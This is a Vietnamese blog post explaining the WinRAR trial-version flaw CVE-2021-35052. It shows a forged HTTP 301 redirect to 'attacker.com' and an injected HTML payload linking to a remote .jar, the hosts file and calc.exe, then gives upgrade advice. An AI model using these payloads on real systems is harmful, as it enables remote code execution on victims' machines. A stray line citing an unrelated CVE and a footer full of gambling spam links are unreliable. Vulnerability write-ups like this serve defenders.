• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
  • Công cụ đổi số thành chữ
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Khai thác lỗ hổng WinRAR để phát tán mã độc trên Windows

Phiên bản dùng thử của WinRAR dễ bị tấn công: khi phần mềm miễn phí không miễn phí

Ellyx13 by Ellyx13
21/10/2021 - Updated on 24/07/2025
in Basic Hacking
A A
0

Mục lục bài viết

  1. Winrar là gì?
  2. Kết quả
  3. Sửa đổi phản hồi của người dùng
  4. Thực thi mã từ xa
  5. Câu hỏi thường gặp
    1. Lỗ hổng WinRAR CVE-2021-35052 là gì?
    2. Tôi có bị ảnh hưởng bởi lỗ hổng này không?
    3. Làm thế nào để bảo vệ mình khỏi lỗ hổng này?

Bài viết này sẽ mô tả một lỗ hổng trong phiên bản dùng thử của WinRAR có hậu quả nghiêm trọng đối với việc quản lý phần mềm của bên thứ ba. Lỗ hổng này cho Hacker chặn và sửa đổi các yêu cầu được gửi đến người dùng ứng dụng. Lỗ hổng này có thể được sử dụng để thực thi mã từ xa (RCE) trên máy tính của nạn nhân. Lỗi này có tên là mã CVE-2021-35052.

📢 Tham gia kênh Telegram của AnonyViet
👉 Vào Telegram AnonyViet
Cập nhật bài mới, tools hay và thủ thuật IT nhanh nhất

Winrar là gì?

WinRAR là ứng dụng quản lý các tập tin lưu trữ trên hệ điều hành Windows. Nó cho phép tạo và giải nén các định dạng lưu trữ phổ biến như RAR và ZIP. Nó được phân phối dưới dạng phần mềm dùng thử, cho phép người dùng trải nghiệm đầy đủ các tính năng của ứng dụng trong số ngày nhất định. Sau đó, người dùng có thể tiếp tục sử dụng các ứng dụng miễn phí nhưng bị tắt một số tính năng.

Các bài viết liên quan

Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén 15

Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén

19/08/2023
Cách bẻ khóa Password WinRAR: Mở khóa tập tin được bảo vệ bằng mật khẩu 16

Cách bẻ khóa Password WinRAR: Mở khóa tập tin được bảo vệ bằng mật khẩu

01/01/2022 - Updated on 25/07/2025
Hướng dẫn Hack Password giải nén file RAR không cần phần mềm 17

Hướng dẫn Hack Password giải nén file RAR không cần phần mềm

28/07/2020 - Updated on 24/07/2025
Download WinRAR 5.90 Full Key - Cách tự tạo Key kích hoạt cho Winrar 18

Download WinRAR 5.90 Full Key – Cách tự tạo Key kích hoạt cho Winrar

03/04/2020 - Updated on 24/07/2025

Kết quả

Tác giả tình cờ tìm thấy lỗ hổng này trong WinRAR phiên bản 5.70, khi sử dụng hết thời gian dùng thử, sẽ xuất hiện một lỗi Javascript.

Phiên bản dùng thử của WinRAR dễ bị tấn công: khi phần mềm miễn phí không miễn phí

Hơi ngạc nhiên vì lỗi này chỉ xuất hiện ở trình duyệt Internet Explorer.

Sau một vài thử nghiệm, rõ ràng là khi thời gian dùng thử đã hết, thì khoảng một trong ba lần khởi chạy ứng dụng WinRAR.exe, sẽ hiển thị thông báo này. Cửa sổ này sử dụng mshtml.dll cho Borland C ++ có trong WinRAR.

Khai thác lỗ hổng WinRAR để phát tán mã độc trên Windows 10

Tác giả đã thiết lập Burp Suite làm proxy Windows mặc định và để phân tích dữ liệu gửi đi từ cửa sổ lỗi WinRar xem liệu có thể khai thác lỗi này hay không. Khi yêu cầu được gửi qua HTTPS, người dùng WinRAR sẽ nhận được thông báo về chứng chỉ tự ký không an toàn mà Burp sử dụng. Tuy nhiên, theo kinh nghiệm, nhiều người dùng sẽ nhấp vào “Yes” để tiếp tục sử dụng ứng dụng.

Khai thác lỗ hổng WinRAR để phát tán mã độc trên Windows 11

Nhìn vào yêu cầu nay, chúng ta có thể thấy phiên bản (5.7.0) và Winrar x64

GET /?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1
Accept: */*
Accept-Language: ru-RU
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: notifier.rarlab.com 
Connection: close
Cookie: _wr=; _gid=; _ga=

Sửa đổi phản hồi của người dùng

Tiếp theo, tác giả đã cố gắng sửa đổi các phản hồi bị chặn từ WinRAR cho người dùng. Nếu code phản hồi được thay đổi thành “301 Moved Permanently” thì yêu cầu chuyển hướng đến tên miền độc hại “attacker.com” của mình sẽ được lưu vào bộ nhớ đệm và tất cả các yêu cầu sẽ được chuyển đến “attacker.com”.

HTTP/1.1 301 Moved Permanently
content-length: 0
Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64
connection: close

Thực thi mã từ xa

Cuộc tấn công Man-in-the-Middle này yêu cầu giả mạo ARP. Tác giả đã thử một số cách tấn công khác nhau để xem có khả thi với loại truy cập này hay không.

<a href="file://10.0.12.34/applications/test.jar">file://10.0.12.34/applications/test.jar</a><br>
<a href="\\10.0.12.34/applications/test.jar">\\10.0.12.34/applications/test.jar</a><br>
<a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br>
<a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br>
<a href="file:///C:\\windows\\system.ini">file:///C:\\windows\\system.ini</a><br>

Đoạn code trên mô tả phản hồi giả mạo hiển thị một số cách tấn công có thể có, chẳng hạn như các ứng dụng đang chạy, truy xuất thông tin máy chủ và mở ứng dụng máy tính.

Khai thác lỗ hổng WinRAR để phát tán mã độc trên Windows 12

Khai thác lỗ hổng WinRAR để phát tán mã độc trên Windows 13

Hầu hết các cách tấn công đều thành công nhưng cần lưu ý rằng nhiều cách tấn công vẫn dẫn đến cảnh báo bảo mật bổ sung của Windows. Để thành công, người dùng cần nhấp vào “Run”.

Khai thác lỗ hổng WinRAR để phát tán mã độc trên Windows 14

Tuy nhiên, có một số loại tệp có thể chạy mà không xuất hiện cảnh báo bảo mật. Đó là:

• .DOCX
• .PDF
• .PY
• .RAR
CVE-2018-20250 tồn tại đối với Winrar 5.7 trở xuống. Do đó bạn cần nâng cấp WinRar ngay bây giờ để tránh bị Hacker tấn công

Một trong những thách thức lớn nhất mà một công ty phải đối mặt là việc quản lý phần mềm của bên thứ ba. Sau khi được cài đặt, phần mềm của bên thứ ba có quyền truy cập để đọc, ghi và sửa đổi dữ liệu trên các thiết bị truy cập vào mạng công ty.

Không thể kiểm tra mọi ứng dụng mà người dùng có thể cài đặt và do đó chính sách IT rất quan trọng để tránh rũi ro về bảo mật.

Câu hỏi thường gặp

Lỗ hổng WinRAR CVE-2021-35052 là gì?

Lỗ hổng CVE-2021-35052 là một lỗ hổng bảo mật trong phiên bản dùng thử của WinRAR (trước phiên bản 5.71). Lỗ hổng này cho phép tin tặc chặn và sửa đổi các yêu cầu được gửi đến máy chủ của WinRAR, dẫn đến việc thực thi mã từ xa (RCE) trên máy tính nạn nhân.

Tôi có bị ảnh hưởng bởi lỗ hổng này không?

Nếu bạn đang sử dụng phiên bản WinRAR dùng thử cũ hơn 5.71, đặc biệt là trên hệ điều hành Windows sử dụng Internet Explorer, bạn có thể bị ảnh hưởng. Nâng cấp WinRAR lên phiên bản mới nhất là cách tốt nhất để khắc phục.

Làm thế nào để bảo vệ mình khỏi lỗ hổng này?

Cập nhật WinRAR lên phiên bản mới nhất (5.71 trở lên) là cách hiệu quả nhất. Ngoài ra, hãy luôn cảnh giác với các liên kết và tệp đính kèm đáng ngờ, và duy trì phần mềm diệt virus và tường lửa hoạt động tốt.

Tags: lỗ hổng của Winrarwinrar
Ellyx13

Ellyx13

DevOps với hơn 7 năm kinh nghiệm trong lĩnh vực hạ tầng, tự động hóa CI/CD và triển khai hệ thống phân tán trên các nền tảng như AWS, Azure và Kubernetes. - AWS Certified DevOps Engineer – Professional - Certified Kubernetes Administrator (CKA) - HashiCorp Certified: Terraform Associate - Docker Certified Associate (DCA) Có người không dám bước vì sợ gãy chân, nhưng sợ gãy chân mà không dám bước đi thì khác nào chân đã gãy.

Related Posts

Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén 19
Tin tức

Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén

19/08/2023
Cách bẻ khóa Password WinRAR: Mở khóa tập tin được bảo vệ bằng mật khẩu 20
Mẹo Vặt Máy Tính

Cách bẻ khóa Password WinRAR: Mở khóa tập tin được bảo vệ bằng mật khẩu

01/01/2022 - Updated on 25/07/2025
Hướng dẫn Hack Password giải nén file RAR không cần phần mềm 21
Basic Hacking

Hướng dẫn Hack Password giải nén file RAR không cần phần mềm

28/07/2020 - Updated on 24/07/2025
Download WinRAR 5.90 Full Key - Cách tự tạo Key kích hoạt cho Winrar 22
Phần mềm máy tính

Download WinRAR 5.90 Full Key – Cách tự tạo Key kích hoạt cho Winrar

03/04/2020 - Updated on 24/07/2025
ACCENT RAR PASSWORD RECOVERY - Crack Password Winrar với vài bước đơn giản 23
Phần mềm máy tính

ACCENT RAR PASSWORD RECOVERY – Crack Password Winrar với vài bước đơn giản

19/09/2018 - Updated on 25/07/2025
Phần mềm giải nén Winrar bản quyền
Phần mềm máy tính

Phần mềm giải nén Winrar bản quyền

18/01/2016 - Updated on 05/10/2018
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

3 tháng Adobe Express Pro miễn phí

Hướng dẫn nhận 3 tháng Adobe Express Pro miễn phí

by Thanh Kim
09/04/2026
0

cách tắt AI trên Gmail

Cách tắt AI trên Gmail để bảo vệ dữ liệu cá nhân tuyệt đối

by Thanh Kim
08/04/2026
0

cách thêm Settings vào Control Center

Cách thêm Settings vào Control Center bằng Shortcuts

by Thanh Kim
07/04/2026
0

Cách nâng cấp SuperGrok Heavy miễn phí

Cách nâng cấp SuperGrok Heavy miễn phí 1 năm qua Amazon Pay

by Thanh Kim
06/04/2026
1

Bình luận gần đây

  • võ văn lợi trong Cách nâng cấp SuperGrok Heavy miễn phí 1 năm qua Amazon Pay
  • Nhật trong Hướng dẫn cài Google TV lên USB để biến PC thành TV
  • cisad trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Huy trong Hướng dẫn đăng ký Google Colab Pro 1 Năm Miễn Phí
  • phamphat trong Cách chạy OpenClaw bằng Crawbot: tiết kiệm chi phí
  • AnonyViet trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • Sơn trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • Hieu trong Share miễn phí bộ 03 Combo khóa học tự học tiếng Anh giao tiếp
  • 45555 trong Sự trỗi dậy của “Người ngoài hành tinh”: Alienware Aurora AC16250 “Vũ khí” tối thượng định hình Gaming năm 2026
  • 45555 trong Cách làm mờ ảnh trên iPhone sau khi chụp cực đơn giản
  • vatuan13 trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • vatuan13 trong Hướng dẫn thiết lập định vị giả trên Zalo
  • AnonyViet trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • hùng lê trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • Kelvin trong Hướng dẫn thi chứng chỉ bảo mật CTIGA miễn phí 100%
  • Minh trong Hướng dẫn kết nối OpenClaw với Whatsapp
  • AnonyViet trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • congdk trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • AnonyViet trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • AnonyViet trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

kết quả xổ số hôm nay U888 33win Ae888 kubet kubet 8kbet 99ok trang chủ sc88 xin88 good88 kubet fm88 kubet thailand vip66 xoso66 https://tp88fun.com/ hello88 qq88 Xoso66 Vip66 hitclub bong99 XOSO66 new882.info Thabet fun88 nhà cái uy tín sunwin sunwin rikvip hitclub sunwin go88 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 https://keonhacai.fund/ sunwin Xoso66 58win fun88.supply EE88 https://da88.design/ https://fun88.supply/ F8BET80 https://q23win.com/ u888 W88 link 58win 58WIN https://bbet88b.com/ OK9 SHBET https://xx88.center/ vswin 789PCOM NHÀ CÁI MMOO TT88COM GO 99 RR88 ABC8 https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ https://xx88.ac/ xx88.me.uk XN88 NOHU90 AF88 HZ88 https://xx88.asia/ 789f NOHU HITCLUB Sunwin 58WIN MV88 888NEW AZ888 PG99 TD88 12bet v9bet 789p NOHU90 Thabet vip66 7mcn hm88 xoso66 DA88 9BET https://daga.rocks https://c168.info/ LC88 Game SH BET https://jun88sr.com/ NOHU90 https://kjcgaming.com/ https://nohutm.com 6789 789Win https://go8.red/ https://urr88.com/ hit club game bai tg88 kèo nhà cái 5 9 win Sunwin UU88 nổ hũ uy tín Go88 https://bancadoithuong.codes/ https://danhdeonline.blog/ Xocdia88 https://nhacaiuytin10.uk.com/ https://keonhacai88.tv/ https://keonhacai.loans/ https://gamebaidoithuong.io/ https://keonhacai.kiwi/ 789club sodo casino ok 8386 xx88 V9BET Sun52 https://918xxy.com/ https://go99bet.live/ https://tt88.ae.org/ kjc https://go99.mx/ 79king nhà cái MB66 Alo789 MV88 sc88 11uu vn23 88CLB Thabet nạp tiền qq88 sun win luck8 https://devmarks.io cwin V9bet ALO8.com F168 rikvip VIN777 Rik88 8kbet KUBET TT88 789club 789club AX88 xoso66 https://sc88.info/ HZ88 MMOO OPEN88 12bet https://nohu90s.asia go88 trang cá độ bóng đá https://nohuq.net/ https://s8inc.com/ SODO https://cm88.uk.net/ ko66 12bet https://cm88.gg/ 8us F168 Jun88 Jun88 fly88 12bet 8DAY https://f168.today/ Vip66 TẢI SUNWIN https://open88seo.com/ Luck8 winvn RED88 VIC88 F168 keobongda.one/ Jun88 https://keonhacaitop.com/ hytw3339 Kết quả bóng đá open88 https://sc88.market/ trang chủ MB66 az888 WIN678 https://789betlol.com/ F168 12bet SH BET vic88 red88 tỷ lệ nhà cái game nổ hũ game bài tỷ số trực tuyến https://qq88pro.vip/ Keonhacai5 23win 7m https://sc88.info/ luckywin hm88 23win 888slot sky88 sodo casino go8

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

wpDiscuz